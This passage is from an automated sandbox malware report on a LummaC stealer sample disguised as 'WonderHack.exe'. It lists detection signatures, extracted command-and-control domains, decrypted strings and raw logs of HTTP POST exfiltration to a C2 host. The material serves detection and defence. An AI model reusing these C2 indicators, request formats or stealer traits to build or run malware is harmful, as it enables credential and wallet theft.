Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
WonderHack.exe

Overview

General Information

Sample name:WonderHack.exe
Analysis ID:1579560
MD5:65fc002ab58b0dc2e95e19b1f308a354
SHA1:68ccb931b324d2988f0bad099dac28ae10dd7588
SHA256:42c47b4221417b2f52c1e783e06d01401b8064a715eb88c54c8d00db8016a2ec
Tags:exeuser-aachum
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
LummaC encrypted strings found
Machine Learning detection for sample
Performs DNS queries to domains with low reputation
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found evasive API chain (date check)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • WonderHack.exe (PID: 6572 cmdline: "C:\Users\user\Desktop\WonderHack.exe" MD5: 65FC002AB58B0DC2E95E19B1F308A354)
    • conhost.exe (PID: 5812 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • WonderHack.exe (PID: 3696 cmdline: "C:\Users\user\Desktop\WonderHack.exe" MD5: 65FC002AB58B0DC2E95E19B1F308A354)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["smash-boiling.cyou", "supporse-comment.cyou", "ripe-blade.cyou", "bellflamre.click", "greywe-snotty.cyou", "steppriflej.xyz", "pollution-raker.cyou", "sendypaster.xyz", "hosue-billowy.cyou"], "Build id": "LPnhqo--ybzklzpanlwp"}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
      SourceRuleDescriptionAuthorStrings
      00000002.00000003.2527201915.0000000000F51000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000002.00000002.2584594143.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
          00000000.00000002.1704771432.0000000002F51000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
            Process Memory Space: WonderHack.exe PID: 3696JoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
              Process Memory Space: WonderHack.exe PID: 3696JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                Click to see the 2 entries
                SourceRuleDescriptionAuthorStrings
                2.2.WonderHack.exe.400000.0.raw.unpackJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
                  2.2.WonderHack.exe.400000.0.unpackJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
                    No Sigma rule has matched
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-12-23T00:48:34.217069+010020283713Unknown Traffic192.168.2.449730193.143.1.9443TCP
                    2024-12-23T00:49:06.217277+010020283713Unknown Traffic192.168.2.449737193.143.1.9443TCP
                    2024-12-23T00:49:09.290585+010020283713Unknown Traffic192.168.2.44976023.55.153.106443TCP
                    2024-12-23T00:49:11.733313+010020283713Unknown Traffic192.168.2.449765104.21.66.86443TCP
                    2024-12-23T00:49:13.815665+010020283713Unknown Traffic192.168.2.449771104.21.66.86443TCP
                    2024-12-23T00:49:16.153911+010020283713Unknown Traffic192.168.2.449777104.21.66.86443TCP
                    2024-12-23T00:49:18.401160+010020283713Unknown Traffic192.168.2.449784104.21.66.86443TCP
                    2024-12-23T00:49:20.953353+010020283713Unknown Traffic192.168.2.449793104.21.66.86443TCP
                    2024-12-23T00:49:23.663286+010020283713Unknown Traffic192.168.2.449800104.21.66.86443TCP
                    2024-12-23T00:49:26.284170+010020283713Unknown Traffic192.168.2.449806104.21.66.86443TCP
                    2024-12-23T00:49:30.201674+010020283713Unknown Traffic192.168.2.449817104.21.66.86443TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-12-23T00:49:12.482826+010020546531A Network Trojan was detected192.168.2.449765104.21.66.86443TCP
                    2024-12-23T00:49:14.582391+010020546531A Network Trojan was detected192.168.2.449771104.21.66.86443TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-12-23T00:49:12.482826+010020498361A Network Trojan was detected192.168.2.449765104.21.66.86443TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-12-23T00:49:14.582391+010020498121A Network Trojan was detected192.168.2.449771104.21.66.86443TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-12-23T00:48:02.275654+010020582121Domain Observed Used for C2 Detected192.168.2.4540731.1.1.153UDP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-12-23T00:49:17.087529+010020480941Malware Command and Control Activity Detected192.168.2.449777104.21.66.86443TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-12-23T00:49:10.056462+010028586661Domain Observed Used for C2 Detected192.168.2.44976023.55.153.106443TCP

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Source: 00000000.00000002.1704771432.0000000002F51000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: LummaC {"C2 url": ["smash-boiling.cyou", "supporse-comment.cyou", "ripe-blade.cyou", "bellflamre.click", "greywe-snotty.cyou", "steppriflej.xyz", "pollution-raker.cyou", "sendypaster.xyz", "hosue-billowy.cyou"], "Build id": "LPnhqo--ybzklzpanlwp"}
                    Source: WonderHack.exeVirustotal: Detection: 38%Perma Link
                    Source: WonderHack.exeReversingLabs: Detection: 28%
                    Source: WonderHack.exeJoe Sandbox ML: detected
                    Source: 00000002.00000002.2584594143.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: pollution-raker.cyou
                    Source: 00000002.00000002.2584594143.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: hosue-billowy.cyou
                    Source: 00000002.00000002.2584594143.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: ripe-blade.cyou
                    Source: 00000002.00000002.2584594143.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: smash-boiling.cyou
                    Source: 00000002.00000002.2584594143.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: supporse-comment.cyou
                    Source: 00000002.00000002.2584594143.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: greywe-snotty.cyou
                    Source: 00000002.00000002.2584594143.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: steppriflej.xyz
                    Source: 00000002.00000002.2584594143.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: sendypaster.xyz
                    Source: 00000002.00000002.2584594143.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: bellflamre.click
                    Source: 00000002.00000002.2584594143.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
                    Source: 00000002.00000002.2584594143.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
                    Source: 00000002.00000002.2584594143.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
                    Source: 00000002.00000002.2584594143.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
                    Source: 00000002.00000002.2584594143.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: Workgroup: -
                    Source: 00000002.00000002.2584594143.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: LPnhqo--ybzklzpanlwp
                    Source: WonderHack.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                    Source: unknownHTTPS traffic detected: 23.55.153.106:443 -> 192.168.2.4:49760 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.4:49765 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.4:49771 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.4:49777 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.4:49784 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.4:49793 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.4:49800 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.4:49806 version: TLS 1.2
                    Source: WonderHack.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_ISOLATION, TERMINAL_SERVER_AWARE
                    Source: C:\Users\user\Desktop\WonderHack.exeCode function: 0_2_00CB9126 FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00CB9126

                    Networking

                    barindex
                    Source: Network trafficSuricata IDS: 2058212 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bellflamre .click) : 192.168.2.4:54073 -> 1.1.1.1:53
                    Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49765 -> 104.21.66.86:443
                    Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49765 -> 104.21.66.86:443
                    Source: Network trafficSuricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.4:49760 -> 23.55.153.106:443
                    Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49771 -> 104.21.66.86:443
                    Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49771 -> 104.21.66.86:443
                    Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49777 -> 104.21.66.86:443
                    Source: Malware configuration extractorURLs: smash-boiling.cyou
                    Source: Malware configuration extractorURLs: supporse-comment.cyou
                    Source: Malware configuration extractorURLs: ripe-blade.cyou
                    Source: Malware configuration extractorURLs: bellflamre.click
                    Source: Malware configuration extractorURLs: greywe-snotty.cyou
                    Source: Malware configuration extractorURLs: steppriflej.xyz
                    Source: Malware configuration extractorURLs: pollution-raker.cyou
                    Source: Malware configuration extractorURLs: sendypaster.xyz
                    Source: Malware configuration extractorURLs: hosue-billowy.cyou
                    Source: DNS query: sendypaster.xyz
                    Source: DNS query: steppriflej.xyz
                    Source: Joe Sandbox ViewIP Address: 104.21.66.86 104.21.66.86
                    Source: Joe Sandbox ViewIP Address: 23.55.153.106 23.55.153.106
                    Source: Joe Sandbox ViewASN Name: BITWEB-ASRU BITWEB-ASRU
                    Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49737 -> 193.143.1.9:443
                    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49730 -> 193.143.1.9:443
                    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49793 -> 104.21.66.86:443
                    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49760 -> 23.55.153.106:443
                    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49784 -> 104.21.66.86:443
                    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49806 -> 104.21.66.86:443
                    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49817 -> 104.21.66.86:443
                    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49765 -> 104.21.66.86:443
                    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49800 -> 104.21.66.86:443
                    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49777 -> 104.21.66.86:443
                    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49771 -> 104.21.66.86:443
                    Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
                    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: lev-tolstoi.com
                    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 54Host: lev-tolstoi.com
                    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=38YTQXSPNP1CBNUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18146Host: lev-tolstoi.com
                    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=AF7HU3P5H1TUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8749Host: lev-tolstoi.com
                    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=D4D6LD3A1MO86BTXG0IUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20450Host: lev-tolstoi.com
                    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=SBUV6UEUOZ0XP5QUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1225Host: lev-tolstoi.com
                    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=WQKZ4A7CKB5User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 587715Host: lev-tolstoi.com
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
                    Source: WonderHack.exe, 00000002.00000003.2430204975.0000000000F08000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407396885.0000000000F08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: .fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https: equals www.youtube.com (Youtube)
                    Source: WonderHack.exe, 00000002.00000003.2407396885.0000000000F08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: d.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
                    Source: WonderHack.exe, 00000002.00000003.2407396885.0000000000F08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: d.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=Nonesessionid=32d8a0bc1b3577f29e8cdb62; Path=/; Secure; SameSite=NoneSet-CookienginxServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedMon, 26 Jul 1997 05:00:00 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; charset=UTF-8Content-Type35121Content-LengthAllowWarningViaUpgradeTransfer-EncodingTrailerPragmaKeep-AliveSun, 22 Dec 2024 23:49:09 GMTDateProxy-ConnectioncloseConnectionno-cacheCache-Control equals www.youtube.com (Youtube)
                    Source: global trafficDNS traffic detected: DNS query: bellflamre.click
                    Source: global trafficDNS traffic detected: DNS query: sendypaster.xyz
                    Source: global trafficDNS traffic detected: DNS query: steppriflej.xyz
                    Source: global trafficDNS traffic detected: DNS query: greywe-snotty.cyou
                    Source: global trafficDNS traffic detected: DNS query: supporse-comment.cyou
                    Source: global trafficDNS traffic detected: DNS query: smash-boiling.cyou
                    Source: global trafficDNS traffic detected: DNS query: ripe-blade.cyou
                    Source: global trafficDNS traffic detected: DNS query: hosue-billowy.cyou
                    Source: global trafficDNS traffic detected: DNS query: pollution-raker.cyou
                    Source: global trafficDNS traffic detected: DNS query: steamcommunity.com
                    Source: global trafficDNS traffic detected: DNS query: lev-tolstoi.com
                    Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: lev-tolstoi.com
                    Source: WonderHack.exe, 00000002.00000003.2407396885.0000000000F08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:27060
                    Source: WonderHack.exe, 00000002.00000003.2478133377.0000000003325000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                    Source: WonderHack.exe, 00000002.00000003.2478133377.0000000003325000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                    Source: WonderHack.exe, 00000002.00000003.2478133377.0000000003325000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
                    Source: WonderHack.exe, 00000002.00000003.2478133377.0000000003325000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                    Source: WonderHack.exe, 00000002.00000003.2478133377.0000000003325000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                    Source: WonderHack.exe, 00000002.00000003.2478133377.0000000003325000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                    Source: WonderHack.exe, 00000002.00000003.2478133377.0000000003325000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
                    Source: WonderHack.exe, 00000002.00000003.2478133377.0000000003325000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                    Source: WonderHack.exe, 00000002.00000003.2478133377.0000000003325000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
                    Source: WonderHack.exe, 00000002.00000003.2407264912.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2430172119.0000000000F61000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
                    Source: WonderHack.exe, 00000002.00000003.2407264912.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/privacy_agreement/
                    Source: WonderHack.exe, 00000002.00000003.2407264912.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2430172119.0000000000F61000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/subscriber_agreement/
                    Source: WonderHack.exe, 00000002.00000002.2585120871.0000000000EAC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered_
                    Source: WonderHack.exe, 00000002.00000003.2407264912.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.valvesoftware.com/legal.htm
                    Source: WonderHack.exe, 00000002.00000003.2478133377.0000000003325000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                    Source: WonderHack.exe, 00000002.00000003.2478133377.0000000003325000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                    Source: WonderHack.exe, 00000002.00000003.2430953439.000000000332B000.00000004.00000800.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2431176780.0000000003329000.00000004.00000800.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2431020872.0000000003329000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                    Source: WonderHack.exe, 00000002.00000003.2407396885.0000000000F08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.steampowered.com/
                    Source: WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407281203.0000000000EBB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
                    Source: WonderHack.exe, 00000002.00000003.2479583191.00000000032E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
                    Source: WonderHack.exe, 00000002.00000003.2407396885.0000000000F08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://broadcast.st.dl.eccdnx.com
                    Source: WonderHack.exe, 00000002.00000003.2430953439.000000000332B000.00000004.00000800.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2431176780.0000000003329000.00000004.00000800.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2431020872.0000000003329000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                    Source: WonderHack.exe, 00000002.00000003.2430953439.000000000332B000.00000004.00000800.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2431176780.0000000003329000.00000004.00000800.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2431020872.0000000003329000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                    Source: WonderHack.exe, 00000002.00000003.2430953439.000000000332B000.00000004.00000800.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2431176780.0000000003329000.00000004.00000800.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2431020872.0000000003329000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                    Source: WonderHack.exe, 00000002.00000003.2407396885.0000000000F08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://checkout.steampowered.com/
                    Source: WonderHack.exe, 00000002.00000003.2430204975.0000000000F08000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407396885.0000000000F08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.stP
